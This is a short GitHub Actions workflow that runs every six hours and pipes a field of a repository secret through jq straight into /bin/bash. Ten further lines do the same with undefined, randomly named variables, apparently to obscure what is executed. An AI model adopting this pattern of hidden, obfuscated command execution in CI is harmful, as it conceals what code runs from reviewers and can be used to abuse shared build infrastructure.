name: guazaiunity
on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guazaiunity
        env:
          iub2: ${{ secrets.iub2 }}
        run: |
          echo $iub2 | jq -r .thyhm03698 | /bin/bash
          echo $vju9 | jq -r .nz6 | /bin/bash
          echo $rexo11 | jq -r .ghg4 | /bin/bash
          echo $b424 | jq -r .p1471 | /bin/bash
          echo $u440 | jq -r .d0695 | /bin/bash
          echo $athf920 | jq -r .q7482 | /bin/bash
          echo $sk4 | jq -r .amgby259 | /bin/bash
          echo $cjgpx1 | jq -r .bbd69 | /bin/bash
          echo $lo35388 | jq -r .k4 | /bin/bash
          echo $ajmq66459 | jq -r .zjs5 | /bin/bash
          echo $cs0800 | jq -r .n3702 | /bin/bash

